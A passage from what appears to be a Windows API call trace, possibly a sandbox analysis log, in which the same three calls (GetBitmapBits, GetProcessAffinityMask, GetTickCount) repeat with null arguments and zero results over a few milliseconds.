cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.501] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.501] GetTickCount () returned 0x2004ffa [0099.501] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.501] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.501] GetTickCount () returned 0x2004ffa [0099.501] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.501] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.501] GetTickCount () returned 0x2004ffa [0099.501] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.501] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.501] GetTickCount () returned 0x2004ffa [0099.501] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.501] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.501] GetTickCount () returned 0x2004ffa [0099.501] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.501] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.501] GetTickCount () returned 0x2004ffa [0099.501] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.501] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.501] GetTickCount () returned 0x2004ffa [0099.501] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.501] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.501] GetTickCount () returned 0x2004ffa [0099.501] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.502] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.502] GetTickCount () returned 0x2004ffa [0099.502] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.502] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.502] GetTickCount () returned 0x2004ffa [0099.502] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.502] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.502] GetTickCount () returned 0x2004ffa [0099.502] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.502] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.502] GetTickCount () returned 0x2004ffa [0099.502] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.502] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.502] GetTickCount () returned 0x2004ffa [0099.502] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.502] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.502] GetTickCount () returned 0x2004ffa [0099.502] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.502] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.502] GetTickCount () returned 0x2004ffa [0099.502] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.503] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.503] GetTickCount () returned 0x2004ffa [0099.503] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.503] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.503] GetTickCount () returned 0x2004ffa [0099.503] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.503] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.503] GetTickCount () returned 0x2004ffa [0099.503] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.503] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.503] GetTickCount () returned 0x2004ffa [0099.503] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.503] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.503] GetTickCount () returned 0x2004ffa [0099.503] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.503] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.503] GetTickCount () returned 0x2004ffa [0099.503] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.504] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.504] GetTickCount () returned 0x2004ffa [0099.504] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.504] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.504] GetTickCount () returned 0x2004ffa [0099.504] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.504] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.504] GetTickCount () returned 0x2004ffa [0099.504] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.504] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.504] GetTickCount () returned 0x2004ffa [0099.504] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.504] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.504] GetTickCount () returned 0x2004ffa [0099.504] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.504] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.504] GetTickCount () returned 0x2004ffa [0099.504] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.504] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.504] GetTickCount () returned 0x2004ffa [0099.505] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.505] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.505] GetTickCount () returned 0x2004ffa [0099.505] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.505] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.505] GetTickCount () returned 0x2004ffa [0099.505] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.505] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.505] GetTickCount () returned 0x2004ffa [0099.505] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.505] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.505] GetTickCount () returned 0x2004ffa [0099.505] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.505] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.505] GetTickCount () returned 0x2004ffa [0099.505] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.505] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.505] GetTickCount () returned 0x2004ffa [0099.505] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.505] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.505] GetTickCount () returned 0x2004ffa [0099.505] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.505] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.505] GetTickCount () returned 0x2004ffa [0099.506] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.506] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.506] GetTickCount () returned 0x2004ffa [0099.506] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.506] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.506] GetTickCount () returned 0x2004ffa [0099.506] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.506] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.506] GetTickCount () returned 0x2004ffa [0099.506] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.506] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.506] GetTickCount () returned 0x2004ffa [0099.506] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.506] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.506] GetTickCount () returned 0x2005009 [0099.506] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.506] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.506] GetTickCount () returned 0x2005009 [0099.506] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.506] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.506] GetTickCount () returned 0x2005009 [0099.506] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.506] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.506] GetTickCount () returned 0x2005009 [0099.506] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.507] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.507] GetTickCount () returned 0x2005009 [0099.507] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.507] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.507] GetTickCount () returned 0x2005009 [0099.507] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.507] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.507] GetTickCount () returned 0x2005009 [0099.507] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.507] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.507] GetTickCount () returned 0x2005009 [0099.507] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.507] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.507] GetTickCount () returned 0x2005009 [0099.507] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.507] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.507] GetTickCount () returned 0x2005009 [0099.507] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.507] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.507] GetTickCount () returned 0x2005009 [0099.507] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.507] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.507] GetTickCount () returned 0x2005009 [0099.507] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.508] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.508] GetTickCount () returned 0x2005009 [0099.508] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.508] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.508] GetTickCount () returned 0x2005009 [0099.508] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.508] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.508] GetTickCount () returned 0x2005009 [0099.508] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.508] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.508] GetTickCount () returned 0x2005009 [0099.508] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.508] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.508] GetTickCount () returned 0x2005009 [0099.508] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.508] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.508] GetTickCount () returned 0x2005009 [0099.508] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.508] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.508] GetTickCount () returned 0x2005009 [0099.508] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.508] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.508] GetTickCount () returned 0x2005009 [0099.508] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.508] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.509] GetTickCount () returned 0x2005009 [0099.509] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.509] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.509] GetTickCount () returned 0x2005009 [0099.509] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.509] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.509] GetTickCount () returned 0x2005009 [0099.509] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.509] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.509] GetTickCount () returned 0x2005009 [0099.509] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.509] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.509] GetTickCount () returned 0x2005009 [0099.509] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.509] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.509] GetTickCount () returned 0x2005009 [0099.509] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.509] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.509] GetTickCount () returned 0x2005009 [0099.509] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.509] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.509] GetTickCount () returned 0x2005009 [0099.509] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.509] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.510] GetTickCount () returned 0x2005009 [0099.510] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.510] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.510] GetTickCount () returned 0x2005009 [0099.510] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.510] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.510] GetTickCount () returned 0x2005009 [0099.510] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.510] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.510] GetTickCount () returned 0x2005009 [0099.510] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.510] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.510] GetTickCount () returned 0x2005009 [0099.510] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.510] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.510] GetTickCount () returned 0x2005009 [0099.510] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.510] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.510] GetTickCount () returned 0x2005009 [0099.510] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.510] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.510] GetTickCount () returned 0x2005009 [0099.510] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.510] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.510] GetTickCount () returned 0x2005009 [0099.511] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.511] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.511] GetTickCount () returned 0x2005009 [0099.511] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.511] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.511] GetTickCount () returned 0x2005009 [0099.511] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.511] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.511] GetTickCount () returned 0x2005009 [0099.511] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.511] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.511] GetTickCount () returned 0x2005009 [0099.511] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.511] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.511] GetTickCount () returned 0x2005009 [0099.511] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.511] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, 